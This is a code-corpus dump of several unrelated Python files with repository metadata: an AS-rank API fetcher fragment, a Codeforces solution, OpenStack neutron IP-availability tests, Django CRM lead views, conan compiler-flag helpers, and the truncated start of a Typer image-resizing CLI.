            asns = data['data']['asns']
            for edge in asns['edges']:
                # Renamed from 'asn' to avoid rebinding the loop variable.
                node = edge['node']
                asn = int(node['asn'])
                rank = int(node['rank'])
                links = self._get_links(asn)
                rows.append([rank, asn, node['asnName'], links])
                count += 1
            if asns['pageInfo']['hasNextPage'] is False:
                next_page = False
                final_count = asns['totalCount']
            if last_rank is not None:
                if count >= last_rank:
                    next_page = False
                    final_count = asns['totalCount']
                elif (first + count) >= last_rank:
                    # Shrink the final page so we stop exactly at last_rank.
                    first = last_rank - count + 1
                    offset = count
        path = os.path.join(self.csv_dir, 'as_rank_v2.csv')
        utils.rows_to_db(rows, path, AS_Rank_V2, clear_table=False)
        return final_count

    def _get_links(self, asn):
        """Return the ASNs linked to *asn* as a psql array literal.

        Pages through the asnLinks endpoint 1000 links at a time and
        builds a string of the form '{asn1,asn2,...}'.
        """
        offset = 0
        first = 1000
        next_page = True
        # Can't use a python array due to psql not accepting it easy
        rows = '{'
        while next_page:
            url = self.url_base + f"asnLinks/{asn}?first={first}&offset={offset}"
            req = urllib.request.Request(url, None, self.header_base)
            with urllib.request.urlopen(req) as response:
                page = response.read()
            data = json.loads(page.decode('utf-8'))
            asn_links = data['data']['asnLinks']
            if asn_links['edges'] == []:
                # NOTE(review): an empty page discards any links gathered
                # on earlier pages -- confirm the API never returns an
                # empty non-final page.
                return '{}'
            for link in asn_links['edges']:
                rows += link['node']['asn1']['asn'] + ','
            if asn_links['pageInfo']['hasNextPage'] is False:
                # Replace the trailing comma with the closing brace.
                rows = rows[:-1] + '}'
                return rows
            else:
                offset = offset + 1000
| 937 | 0 | 27 |
c51ed96a09e740368a84781e4fac620344758b83 | 393 | py | Python | codeforces.com/758A/solution.py | zubtsov/competitive-programming | 919d63130144347d7f6eddcf8f5bc2afb85fddf3 | [
"MIT"
] | null | null | null | codeforces.com/758A/solution.py | zubtsov/competitive-programming | 919d63130144347d7f6eddcf8f5bc2afb85fddf3 | [
"MIT"
] | null | null | null | codeforces.com/758A/solution.py | zubtsov/competitive-programming | 919d63130144347d7f6eddcf8f5bc2afb85fddf3 | [
"MIT"
] | null | null | null | max_theoretical_welfare = 1000000
# Codeforces 758A: everyone must be raised to the welfare of the richest
# citizen; print the total money required.
citizen_count = int(input())
welfare_levels = [int(token) for token in input().split()]
# Running maximum in the original starts from 0, so include 0 here too.
richest = max([0] + welfare_levels)
# Cost of raising everyone to the theoretical cap, then refund the
# overshoot above the actual richest citizen.
cost_to_cap = sum(max_theoretical_welfare - level for level in welfare_levels)
print(cost_to_cap - citizen_count * (max_theoretical_welfare - richest))
| 28.071429 | 87 | 0.776081 | max_theoretical_welfare = 1000000
# Read the citizen count, then each citizen's current welfare level.
number_of_citizens = int(input())
total_money_spent = 0
max_welfare = 0
for current_welfare in map(int, input().split()):
    # Pretend we raise everyone to the theoretical maximum welfare...
    total_money_spent += (max_theoretical_welfare - current_welfare)
    if current_welfare > max_welfare:
        max_welfare = current_welfare
# ...then refund the overshoot: only the richest citizen's level matters.
print(total_money_spent - number_of_citizens * (max_theoretical_welfare - max_welfare))
| 0 | 0 | 0 |
868d131e12bd9fc7e48c6715c9f81639852f6958 | 19,704 | py | Python | neutron/tests/unit/extensions/test_network_ip_availability.py | ilay09/neutron | b7f9803c88b17a6ebd40fd44d15d4336bea7b394 | [
"Apache-2.0"
] | null | null | null | neutron/tests/unit/extensions/test_network_ip_availability.py | ilay09/neutron | b7f9803c88b17a6ebd40fd44d15d4336bea7b394 | [
"Apache-2.0"
] | null | null | null | neutron/tests/unit/extensions/test_network_ip_availability.py | ilay09/neutron | b7f9803c88b17a6ebd40fd44d15d4336bea7b394 | [
"Apache-2.0"
] | null | null | null | # Copyright 2016 GoDaddy.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from neutron_lib import constants
import neutron.api.extensions as api_ext
import neutron.common.config as config
import neutron.extensions
import neutron.services.network_ip_availability.plugin as plugin_module
import neutron.tests.unit.db.test_db_base_plugin_v2 as test_db_base_plugin_v2
# REST collection name plus the singular/plural response keys used by the
# network-ip-availability extension.
API_RESOURCE = 'network-ip-availabilities'
IP_AVAIL_KEY = 'network_ip_availability'
IP_AVAILS_KEY = 'network_ip_availabilities'
# Search path for loadable API extensions.
EXTENSIONS_PATH = ':'.join(neutron.extensions.__path__)
# Fully-qualified class path of the service plugin under test.
PLUGIN_NAME = '%s.%s' % (plugin_module.NetworkIPAvailabilityPlugin.__module__,
                         plugin_module.NetworkIPAvailabilityPlugin.__name__)
| 51.989446 | 79 | 0.545321 | # Copyright 2016 GoDaddy.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from neutron_lib import constants
import neutron.api.extensions as api_ext
import neutron.common.config as config
import neutron.extensions
import neutron.services.network_ip_availability.plugin as plugin_module
import neutron.tests.unit.db.test_db_base_plugin_v2 as test_db_base_plugin_v2
# REST collection name plus the singular/plural response keys used by the
# network-ip-availability extension.
API_RESOURCE = 'network-ip-availabilities'
IP_AVAIL_KEY = 'network_ip_availability'
IP_AVAILS_KEY = 'network_ip_availabilities'
# Search path for loadable API extensions.
EXTENSIONS_PATH = ':'.join(neutron.extensions.__path__)
# Fully-qualified class path of the service plugin under test.
PLUGIN_NAME = '%s.%s' % (plugin_module.NetworkIPAvailabilityPlugin.__module__,
                         plugin_module.NetworkIPAvailabilityPlugin.__name__)
class TestNetworkIPAvailabilityAPI(
test_db_base_plugin_v2.NeutronDbPluginV2TestCase):
    def setUp(self):
        """Load the IP-availability service plugin and wire up a test API."""
        svc_plugins = {'plugin_name': PLUGIN_NAME}
        super(TestNetworkIPAvailabilityAPI, self).setUp(
            service_plugins=svc_plugins)
        self.plugin = plugin_module.NetworkIPAvailabilityPlugin()
        # Expose the extension through the paste app so tests can issue
        # requests against self.ext_api.
        ext_mgr = api_ext.PluginAwareExtensionManager(
            EXTENSIONS_PATH, {"network-ip-availability": self.plugin}
        )
        app = config.load_paste_app('extensions_test_app')
        self.ext_api = api_ext.ExtensionMiddleware(app, ext_mgr=ext_mgr)
    def _validate_availability(self, network, availability, expected_used_ips,
                               expected_total_ips=253):
        """Assert one availability entry matches the network and IP counts."""
        self.assertEqual(network['name'], availability['network_name'])
        self.assertEqual(network['id'], availability['network_id'])
        self.assertEqual(expected_used_ips, availability['used_ips'])
        # Default of 253 matches the /24 subnets these tests create.
        self.assertEqual(expected_total_ips, availability['total_ips'])
    def _validate_from_availabilities(self, availabilities, wrapped_network,
                                      expected_used_ips,
                                      expected_total_ips=253):
        """Locate wrapped_network's entry in the list and validate it."""
        network = wrapped_network['network']
        availability = self._find_availability(availabilities, network['id'])
        self.assertIsNotNone(availability)
        self._validate_availability(network, availability,
                                    expected_used_ips=expected_used_ips,
                                    expected_total_ips=expected_total_ips)
def test_usages_query_list_with_fields_total_ips(self):
with self.network() as net:
with self.subnet(network=net):
# list by query fields: total_ips
params = 'fields=total_ips'
request = self.new_list_request(API_RESOURCE, params=params)
response = self.deserialize(self.fmt,
request.get_response(self.ext_api))
self.assertIn(IP_AVAILS_KEY, response)
self.assertEqual(1, len(response[IP_AVAILS_KEY]))
availability = response[IP_AVAILS_KEY][0]
self.assertIn('total_ips', availability)
self.assertEqual(253, availability['total_ips'])
self.assertNotIn('network_id', availability)
def test_usages_query_show_with_fields_total_ips(self):
with self.network() as net:
with self.subnet(network=net):
network = net['network']
# Show by query fields: total_ips
params = ['total_ips']
request = self.new_show_request(API_RESOURCE,
network['id'],
fields=params)
response = self.deserialize(
self.fmt, request.get_response(self.ext_api))
self.assertIn(IP_AVAIL_KEY, response)
availability = response[IP_AVAIL_KEY]
self.assertIn('total_ips', availability)
self.assertEqual(253, availability['total_ips'])
self.assertNotIn('network_id', availability)
    @staticmethod
    def _find_availability(availabilities, net_id):
        """Return the availability entry for net_id, or None if absent."""
        for ip_availability in availabilities:
            if net_id == ip_availability['network_id']:
                return ip_availability
def test_basic(self):
with self.network() as net:
with self.subnet(network=net):
network = net['network']
# Get ALL
request = self.new_list_request(API_RESOURCE, self.fmt)
response = self.deserialize(self.fmt,
request.get_response(self.ext_api))
self.assertIn(IP_AVAILS_KEY, response)
self.assertEqual(1, len(response[IP_AVAILS_KEY]))
self._validate_from_availabilities(response[IP_AVAILS_KEY],
net, 0)
# Get single via id
request = self.new_show_request(API_RESOURCE, network['id'])
response = self.deserialize(
self.fmt, request.get_response(self.ext_api))
self.assertIn(IP_AVAIL_KEY, response)
usage = response[IP_AVAIL_KEY]
self._validate_availability(network, usage, 0)
def test_usages_multi_nets_subnets(self):
with self.network(name='net1') as n1,\
self.network(name='net2') as n2,\
self.network(name='net3') as n3:
# n1 should have 2 subnets, n2 should have none, n3 has 1
with self.subnet(network=n1) as subnet1_1, \
self.subnet(cidr='40.0.0.0/24', network=n3) as subnet3_1:
# Consume 3 ports n1, none n2, 2 ports on n3
with self.port(subnet=subnet1_1),\
self.port(subnet=subnet1_1),\
self.port(subnet=subnet1_1),\
self.port(subnet=subnet3_1),\
self.port(subnet=subnet3_1):
# Test get ALL
request = self.new_list_request(API_RESOURCE)
response = self.deserialize(
self.fmt, request.get_response(self.ext_api))
self.assertIn(IP_AVAILS_KEY, response)
self.assertEqual(3, len(response[IP_AVAILS_KEY]))
data = response[IP_AVAILS_KEY]
self._validate_from_availabilities(data, n1, 3, 253)
self._validate_from_availabilities(data, n2, 0, 0)
self._validate_from_availabilities(data, n3, 2, 253)
# Test get single via network id
network = n1['network']
request = self.new_show_request(API_RESOURCE,
network['id'])
response = self.deserialize(
self.fmt, request.get_response(self.ext_api))
self.assertIn(IP_AVAIL_KEY, response)
self._validate_availability(network,
response[IP_AVAIL_KEY], 3, 253)
def test_usages_multi_nets_subnets_sums(self):
with self.network(name='net1') as n1:
# n1 has 2 subnets
with self.subnet(network=n1) as subnet1_1, \
self.subnet(cidr='40.0.0.0/24', network=n1) as subnet1_2:
# Consume 3 ports n1: 1 on subnet 1 and 2 on subnet 2
with self.port(subnet=subnet1_1),\
self.port(subnet=subnet1_2),\
self.port(subnet=subnet1_2):
# Get ALL
request = self.new_list_request(API_RESOURCE)
response = self.deserialize(
self.fmt, request.get_response(self.ext_api))
self.assertIn(IP_AVAILS_KEY, response)
self.assertEqual(1, len(response[IP_AVAILS_KEY]))
self._validate_from_availabilities(response[IP_AVAILS_KEY],
n1, 3, 506)
# Get single via network id
network = n1['network']
request = self.new_show_request(API_RESOURCE,
network['id'])
response = self.deserialize(
self.fmt, request.get_response(self.ext_api))
self.assertIn(IP_AVAIL_KEY, response)
self._validate_availability(network,
response[IP_AVAIL_KEY], 3, 506)
def test_usages_port_consumed_v4(self):
with self.network() as net:
with self.subnet(network=net) as subnet:
request = self.new_list_request(API_RESOURCE)
# Consume 2 ports
with self.port(subnet=subnet), self.port(subnet=subnet):
response = self.deserialize(self.fmt,
request.get_response(
self.ext_api))
self._validate_from_availabilities(response[IP_AVAILS_KEY],
net, 2)
def test_usages_query_ip_version_v4(self):
with self.network() as net:
with self.subnet(network=net):
# Get IPv4
params = 'ip_version=4'
request = self.new_list_request(API_RESOURCE, params=params)
response = self.deserialize(self.fmt,
request.get_response(self.ext_api))
self.assertIn(IP_AVAILS_KEY, response)
self.assertEqual(1, len(response[IP_AVAILS_KEY]))
self._validate_from_availabilities(response[IP_AVAILS_KEY],
net, 0)
# Get IPv6 should return empty array
params = 'ip_version=6'
request = self.new_list_request(API_RESOURCE, params=params)
response = self.deserialize(self.fmt,
request.get_response(self.ext_api))
self.assertEqual(0, len(response[IP_AVAILS_KEY]))
def test_usages_query_ip_version_v6(self):
with self.network() as net:
with self.subnet(
network=net, cidr='2607:f0d0:1002:51::/64',
ip_version=6,
ipv6_address_mode=constants.DHCPV6_STATELESS):
# Get IPv6
params = 'ip_version=6'
request = self.new_list_request(API_RESOURCE, params=params)
response = self.deserialize(self.fmt,
request.get_response(self.ext_api))
self.assertEqual(1, len(response[IP_AVAILS_KEY]))
self._validate_from_availabilities(
response[IP_AVAILS_KEY], net, 0, 18446744073709551614)
# Get IPv4 should return empty array
params = 'ip_version=4'
request = self.new_list_request(API_RESOURCE, params=params)
response = self.deserialize(self.fmt,
request.get_response(self.ext_api))
self.assertEqual(0, len(response[IP_AVAILS_KEY]))
def test_usages_ports_consumed_v6(self):
with self.network() as net:
with self.subnet(
network=net, cidr='2607:f0d0:1002:51::/64',
ip_version=6,
ipv6_address_mode=constants.DHCPV6_STATELESS) as subnet:
request = self.new_list_request(API_RESOURCE)
# Consume 3 ports
with self.port(subnet=subnet),\
self.port(subnet=subnet), \
self.port(subnet=subnet):
response = self.deserialize(
self.fmt, request.get_response(self.ext_api))
self._validate_from_availabilities(response[IP_AVAILS_KEY],
net, 3,
18446744073709551614)
def test_usages_query_network_id(self):
with self.network() as net:
with self.subnet(network=net):
network = net['network']
test_id = network['id']
# Get by query param: network_id
params = 'network_id=%s' % test_id
request = self.new_list_request(API_RESOURCE, params=params)
response = self.deserialize(self.fmt,
request.get_response(self.ext_api))
self.assertIn(IP_AVAILS_KEY, response)
self.assertEqual(1, len(response[IP_AVAILS_KEY]))
self._validate_from_availabilities(response[IP_AVAILS_KEY],
net, 0)
# Get by NON-matching query param: network_id
params = 'network_id=clearlywontmatch'
request = self.new_list_request(API_RESOURCE, params=params)
response = self.deserialize(self.fmt,
request.get_response(self.ext_api))
self.assertEqual(0, len(response[IP_AVAILS_KEY]))
def test_usages_query_network_name(self):
test_name = 'net_name_1'
with self.network(name=test_name) as net:
with self.subnet(network=net):
# Get by query param: network_name
params = 'network_name=%s' % test_name
request = self.new_list_request(API_RESOURCE, params=params)
response = self.deserialize(self.fmt,
request.get_response(self.ext_api))
self.assertIn(IP_AVAILS_KEY, response)
self.assertEqual(1, len(response[IP_AVAILS_KEY]))
self._validate_from_availabilities(response[IP_AVAILS_KEY],
net, 0)
# Get by NON-matching query param: network_name
params = 'network_name=clearly-wont-match'
request = self.new_list_request(API_RESOURCE, params=params)
response = self.deserialize(self.fmt,
request.get_response(self.ext_api))
self.assertEqual(0, len(response[IP_AVAILS_KEY]))
def test_usages_query_tenant_id(self):
test_tenant_id = 'a-unique-test-id'
with self.network(tenant_id=test_tenant_id) as net:
with self.subnet(network=net):
# Get by query param: network_name
params = 'tenant_id=%s' % test_tenant_id
request = self.new_list_request(API_RESOURCE, params=params)
response = self.deserialize(self.fmt,
request.get_response(self.ext_api))
self.assertIn(IP_AVAILS_KEY, response)
self.assertEqual(1, len(response[IP_AVAILS_KEY]))
self._validate_from_availabilities(response[IP_AVAILS_KEY],
net, 0)
for net_avail in response[IP_AVAILS_KEY]:
self.assertEqual(test_tenant_id, net_avail['tenant_id'])
# Get by NON-matching query param: network_name
params = 'tenant_id=clearly-wont-match'
request = self.new_list_request(API_RESOURCE, params=params)
response = self.deserialize(self.fmt,
request.get_response(self.ext_api))
self.assertEqual(0, len(response[IP_AVAILS_KEY]))
    def test_usages_multi_net_multi_subnet_46(self):
        """Verify availability over mixed IPv4/IPv6 networks.

        Builds two v6 and two v4 networks, consumes 1-2 IPs on each, then
        checks the unfiltered listing, the ``ip_version`` filter, and a
        multi-value ``network_id`` filter (IN clause).
        """
        # Setup mixed v4/v6 networks with IPs consumed on each
        with self.network(name='net-v6-1') as net_v6_1, \
                self.network(name='net-v6-2') as net_v6_2, \
                self.network(name='net-v4-1') as net_v4_1, \
                self.network(name='net-v4-2') as net_v4_2:
            with self.subnet(network=net_v6_1, cidr='2607:f0d0:1002:51::/64',
                             ip_version=6) as s61, \
                    self.subnet(network=net_v6_2,
                                cidr='2607:f0d0:1003:52::/64',
                                ip_version=6) as s62, \
                    self.subnet(network=net_v4_1, cidr='10.0.0.0/24') as s41, \
                    self.subnet(network=net_v4_2, cidr='10.0.1.0/24') as s42:
                # One port on each "-1" network, two ports on each "-2".
                with self.port(subnet=s61),\
                        self.port(subnet=s62), self.port(subnet=s62), \
                        self.port(subnet=s41), \
                        self.port(subnet=s42), self.port(subnet=s42):
                    # Verify consumption across all
                    request = self.new_list_request(API_RESOURCE)
                    response = self.deserialize(
                        self.fmt, request.get_response(self.ext_api))
                    avails_list = response[IP_AVAILS_KEY]
                    # 18446744073709551614 == 2**64 - 2: the expected
                    # total for a /64 subnet here (presumably excluding
                    # reserved addresses — confirm against the API).
                    self._validate_from_availabilities(
                        avails_list, net_v6_1, 1, 18446744073709551614)
                    self._validate_from_availabilities(
                        avails_list, net_v6_2, 2, 18446744073709551614)
                    self._validate_from_availabilities(
                        avails_list, net_v4_1, 1, 253)
                    self._validate_from_availabilities(
                        avails_list, net_v4_2, 2, 253)
                    # Query by IP versions. Ensure subnet versions match
                    for ip_ver in [4, 6]:
                        params = 'ip_version=%i' % ip_ver
                        request = self.new_list_request(API_RESOURCE,
                                                        params=params)
                        response = self.deserialize(
                            self.fmt, request.get_response(self.ext_api))
                        for net_avail in response[IP_AVAILS_KEY]:
                            for sub in net_avail['subnet_ip_availability']:
                                self.assertEqual(ip_ver, sub['ip_version'])
                    # Verify consumption querying 2 network ids (IN clause)
                    request = self.new_list_request(
                        API_RESOURCE,
                        params='network_id=%s&network_id=%s'
                               % (net_v4_2['network']['id'],
                                  net_v6_2['network']['id']))
                    response = self.deserialize(
                        self.fmt, request.get_response(self.ext_api))
                    avails_list = response[IP_AVAILS_KEY]
                    self._validate_from_availabilities(
                        avails_list, net_v6_2, 2, 18446744073709551614)
                    self._validate_from_availabilities(
                        avails_list, net_v4_2, 2, 253)
| 17,916 | 549 | 23 |
216a9777e24096faf53003965097897032262b52 | 1,530 | py | Python | leads/views.py | tapanhp/django_crm | d092af1faf37c62674dc05d5faaeeba5fcc6bb68 | [
"MIT"
] | null | null | null | leads/views.py | tapanhp/django_crm | d092af1faf37c62674dc05d5faaeeba5fcc6bb68 | [
"MIT"
] | null | null | null | leads/views.py | tapanhp/django_crm | d092af1faf37c62674dc05d5faaeeba5fcc6bb68 | [
"MIT"
] | null | null | null | from django.shortcuts import render, redirect
from .models import Lead, Agent
from .forms import LeadModelForm, LeadForm
from django.views.generic import TemplateView
# The newest implementation supporting model forms
| 30 | 84 | 0.69085 | from django.shortcuts import render, redirect
from .models import Lead, Agent
from .forms import LeadModelForm, LeadForm
from django.views.generic import TemplateView
class LandingPageView(TemplateView):
    """Static landing page rendered from the ``landing.html`` template."""
    template_name = "landing.html"
class LeadListView(TemplateView):
    """Render the list of all leads.

    The previous implementation assigned ``extra_context`` at class-definition
    time, so a single shared QuerySet was evaluated once and then served its
    cached (stale) results for every later request. Fetching the leads inside
    ``get_context_data`` re-queries the database on each request. The template
    still receives the same ``leads`` context variable.
    """
    template_name = "leads/lead_list.html"

    def get_context_data(self, **kwargs):
        # Build the context per request so the lead list is always current.
        context = super().get_context_data(**kwargs)
        context["leads"] = Lead.objects.all()
        return context
def lead_details(request, pk):
    """Render the detail page for the lead identified by ``pk``."""
    current_lead = Lead.objects.get(pk=pk)
    return render(
        request,
        template_name="leads/lead_details.html",
        context={"current_lead": current_lead},
    )
def lead_create(request):
    """Show the lead-creation form; persist the lead on a valid POST."""
    # Bind the form to POST data when submitted, otherwise show it empty.
    if request.method == "POST":
        form = LeadModelForm(request.POST)
        if form.is_valid():
            form.save()
            return redirect("/leads")
    else:
        form = LeadModelForm()
    return render(request, template_name="leads/lead_create.html",
                  context={"form": form})
# The newest implementation supporting model forms
def lead_update(request, pk):
    """Edit the existing lead identified by ``pk``.

    Bug fix: the POST branch previously built ``LeadModelForm(request.POST)``
    without ``instance=lead``, so saving created a brand-new Lead instead of
    updating the one being edited. Passing ``instance=lead`` makes the form
    save back onto the existing row.
    """
    lead = Lead.objects.get(pk=pk)
    form = LeadModelForm(instance=lead)
    if request.method == "POST":
        # Bind POST data to the *existing* instance so save() updates it.
        form = LeadModelForm(request.POST, instance=lead)
        if form.is_valid():
            form.save()
            return redirect("/leads")
    context = {"form": form, "lead": lead}
    return render(request, template_name="leads/lead_update.html", context=context)
def lead_delete(request, pk):
    """Delete the lead identified by ``pk`` and return to the list page."""
    # Remove the model object directly; no confirmation template is shown.
    Lead.objects.get(pk=pk).delete()
    return redirect("/leads")
| 1,012 | 156 | 137 |
8a483fb637700edab7aeb2e9ef5a798fec2e6a39 | 5,156 | py | Python | conans/client/build/compiler_flags.py | rukgar/conan | 02e0e1718da20d67348761fe24a39110f70b1664 | [
"MIT"
] | null | null | null | conans/client/build/compiler_flags.py | rukgar/conan | 02e0e1718da20d67348761fe24a39110f70b1664 | [
"MIT"
] | null | null | null | conans/client/build/compiler_flags.py | rukgar/conan | 02e0e1718da20d67348761fe24a39110f70b1664 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
# Visual Studio cl options reference:
# https://msdn.microsoft.com/en-us/library/610ecb4h.aspx
# "Options are specified by either a forward slash (/) or a dash (–)."
# Here we use "-" better than "/" that produces invalid escaped chars using AutoTools.
# -LIBPATH, -D, -I, -ZI and so on.
"""
from conans.tools import unix_path
def architecture_flag(compiler, arch):
    """
    Return the compiler flag selecting the target architecture bitness.

    Only the gcc/clang/sun-cc family understands -m64/-m32; any other
    compiler (or missing input) yields an empty string.
    """
    if not compiler or not arch:
        return ""
    if str(compiler) not in ('gcc', 'apple-clang', 'clang', 'sun-cc'):
        return ""
    bitness = {'x86_64': '-m64', 'sparcv9': '-m64',
               'x86': '-m32', 'sparc': '-m32'}
    return bitness.get(str(arch), "")
def libcxx_flag(compiler, libcxx):
    """
    Return the compiler flag selecting the C++ standard library.

    clang/apple-clang take -stdlib=...; sun-cc uses -library=...; every
    other compiler (or missing input) yields an empty string.
    """
    if not compiler or not libcxx:
        return ""
    compiler_name = str(compiler)
    lib_name = str(libcxx)
    if compiler_name in ('clang', 'apple-clang'):
        # Both libstdc++ flavors map to the same -stdlib value.
        stdlib = {'libstdc++': 'libstdc++',
                  'libstdc++11': 'libstdc++',
                  'libc++': 'libc++'}.get(lib_name)
        return '-stdlib=%s' % stdlib if stdlib else ""
    if compiler_name == 'sun-cc':
        return {"libCstd": "-library=Cstd",
                "libstdcxx": "-library=stdcxx4",
                "libstlport": "-library=stlport4",
                "libstdc++": "-library=stdcpp"}.get(lib_name, "")
    return ""
def pic_flag(compiler=None):
    """
    Return the position-independent-code flag (-fPIC), or "" for MSVC
    and for a missing compiler.
    """
    return "" if not compiler or compiler == 'Visual Studio' else '-fPIC'
def build_type_flag(compiler, build_type):
    """
    Return the flag implied by the build type: -Zi (MSVC Debug),
    -g (gcc/clang Debug), -s (gcc Release strip), else "".
    """
    if not compiler or not build_type:
        return ""
    if str(compiler) == 'Visual Studio':
        # Only Debug carries a flag on MSVC (PDB debug info).
        return '-Zi' if build_type == 'Debug' else ""
    if build_type == 'Debug':
        return '-g'
    if build_type == 'Release' and str(compiler) == 'gcc':
        return '-s'
    return ""
def build_type_define(build_type=None):
    """
    Return the preprocessor define implied by the build type:
    NDEBUG for Release, "" otherwise.
    """
    if build_type == 'Release':
        return 'NDEBUG'
    return ""
def adjust_path(path, win_bash=False, subsystem=None, compiler=None):
    """
    Normalize a path for the compiler command line.

    MSVC gets backslashes, everything else forward slashes; under a
    Windows bash the path is converted to the subsystem's notation; a
    path containing spaces is wrapped in double quotes.
    """
    if str(compiler) == 'Visual Studio':
        normalized = path.replace('/', '\\')
    else:
        normalized = path.replace('\\', '/')
    if win_bash:
        normalized = unix_path(normalized, subsystem)
    return normalized if ' ' not in normalized else '"%s"' % normalized
include_path_option = "-I"
visual_linker_option_separator = "-link" # Further options will apply to the linker
| 31.82716 | 97 | 0.604926 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
# Visual Studio cl options reference:
# https://msdn.microsoft.com/en-us/library/610ecb4h.aspx
# "Options are specified by either a forward slash (/) or a dash (–)."
# Here we use "-" better than "/" that produces invalid escaped chars using AutoTools.
# -LIBPATH, -D, -I, -ZI and so on.
"""
from conans.tools import unix_path
def rpath_flags(os_build, compiler, lib_paths):
    """
    Return linker rpath arguments for every non-empty path in lib_paths.

    Apple platforms use the comma form (-Wl,-rpath,<path>); other OSes
    use the equals form. Only gcc/clang-family compilers produce flags.
    """
    if not os_build:
        return []
    if compiler not in ("clang", "apple-clang", "gcc"):
        return []
    sep = "," if os_build in ("Macos", "iOS", "watchOS", "tvOS") else "="
    flags = []
    for lib_path in lib_paths:
        if lib_path:
            flags.append('-Wl,-rpath%s"%s"' % (sep, lib_path.replace("\\", "/")))
    return flags
def architecture_flag(compiler, arch):
"""
returns flags specific to the target architecture and compiler
"""
if not compiler or not arch:
return ""
if str(compiler) in ['gcc', 'apple-clang', 'clang', 'sun-cc']:
if str(arch) in ['x86_64', 'sparcv9']:
return '-m64'
elif str(arch) in ['x86', 'sparc']:
return '-m32'
return ""
def libcxx_define(compiler, libcxx):
    """
    Return the _GLIBCXX_USE_CXX11_ABI define matching the requested
    libstdc++ flavor, or "" when it does not apply.
    """
    if not compiler or not libcxx:
        return ""
    if str(compiler) not in ('gcc', 'clang', 'apple-clang'):
        return ""
    return {'libstdc++': '_GLIBCXX_USE_CXX11_ABI=0',
            'libstdc++11': '_GLIBCXX_USE_CXX11_ABI=1'}.get(str(libcxx), "")
def libcxx_flag(compiler, libcxx):
"""
returns flag specific to the target C++ standard library
"""
if not compiler or not libcxx:
return ""
if str(compiler) in ['clang', 'apple-clang']:
if str(libcxx) in ['libstdc++', 'libstdc++11']:
return '-stdlib=libstdc++'
elif str(libcxx) == 'libc++':
return '-stdlib=libc++'
elif str(compiler) == 'sun-cc':
return ({"libCstd": "-library=Cstd",
"libstdcxx": "-library=stdcxx4",
"libstlport": "-library=stlport4",
"libstdc++": "-library=stdcpp"}.get(libcxx, ""))
return ""
def pic_flag(compiler=None):
"""
returns PIC (position independent code) flags, such as -fPIC
"""
if not compiler or compiler == 'Visual Studio':
return ""
return '-fPIC'
def build_type_flag(compiler, build_type):
"""
returns flags specific to the build type (Debug, Release, etc.)
(-s, -g, /Zi, etc.)
"""
if not compiler or not build_type:
return ""
if str(compiler) == 'Visual Studio':
if build_type == 'Debug':
return '-Zi'
else:
if build_type == 'Debug':
return '-g'
elif build_type == 'Release' and str(compiler) == 'gcc':
return '-s'
return ""
def build_type_define(build_type=None):
"""
returns definitions specific to the build type (Debug, Release, etc.)
like DEBUG, _DEBUG, NDEBUG
"""
return 'NDEBUG' if build_type == 'Release' else ""
def adjust_path(path, win_bash=False, subsystem=None, compiler=None):
"""
adjusts path to be safely passed to the compiler command line
for Windows bash, ensures path is in format according to the subsystem
for path with spaces, places double quotes around it
converts slashes to backslashes, or vice versa
"""
if str(compiler) == 'Visual Studio':
path = path.replace('/', '\\')
else:
path = path.replace('\\', '/')
if win_bash:
path = unix_path(path, subsystem)
return '"%s"' % path if ' ' in path else path
def sysroot_flag(sysroot, win_bash=False, subsystem=None, compiler=None):
if str(compiler) != 'Visual Studio' and sysroot:
sysroot = adjust_path(sysroot, win_bash=win_bash, subsystem=subsystem, compiler=compiler)
return '--sysroot=%s' % sysroot
return ""
def visual_runtime(runtime):
    """Return the MSVC runtime flag (e.g. ``-MD``), or "" when unset."""
    return "-%s" % runtime if runtime else ""
def format_defines(defines, compiler):
    """
    Prefix every non-empty preprocessor definition with -D.

    The compiler argument is accepted for API symmetry with the other
    format_* helpers but does not affect the output.
    """
    flags = []
    for define in defines:
        if define:
            flags.append("-D%s" % define)
    return flags
include_path_option = "-I"
visual_linker_option_separator = "-link" # Further options will apply to the linker
def format_include_paths(include_paths, win_bash=False, subsystem=None, compiler=None):
return ["%s%s" % (include_path_option, adjust_path(include_path, win_bash=win_bash,
subsystem=subsystem, compiler=compiler))
for include_path in include_paths if include_path]
def format_library_paths(library_paths, win_bash=False, subsystem=None, compiler=None):
pattern = "-LIBPATH:%s" if str(compiler) == 'Visual Studio' else "-L%s"
return [pattern % adjust_path(library_path, win_bash=win_bash,
subsystem=subsystem, compiler=compiler)
for library_path in library_paths if library_path]
def format_libraries(libraries, compiler=None):
    """
    Render non-empty library names as linker arguments: ``name.lib``
    for MSVC, ``-lname`` for everything else.
    """
    if str(compiler) == 'Visual Studio':
        return ["%s.lib" % lib for lib in libraries if lib]
    return ["-l%s" % lib for lib in libraries if lib]
| 1,880 | 0 | 184 |
eda29fae963113bfc8359413b963e765ffb35012 | 3,392 | py | Python | make_responsive_images/main.py | mccarthysean/responsive-images-generator | 3973bf3de69eaff43e6fbf010190626c2eaae2a8 | [
"MIT"
] | null | null | null | make_responsive_images/main.py | mccarthysean/responsive-images-generator | 3973bf3de69eaff43e6fbf010190626c2eaae2a8 | [
"MIT"
] | null | null | null | make_responsive_images/main.py | mccarthysean/responsive-images-generator | 3973bf3de69eaff43e6fbf010190626c2eaae2a8 | [
"MIT"
] | null | null | null | import logging
from pathlib import Path
from typing import Optional
import typer
from . import __app_name__, __version__
from .utils import make_html, resize_image
app = typer.Typer()
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
@app.callback()
@app.command()
# NOTE(review): this function is registered both as the Typer app callback
# and as a command — confirm the double registration is intentional.
def image(
    image: str = typer.Argument(
        str(
            Path(__file__)
            .parent.parent.joinpath("tests")
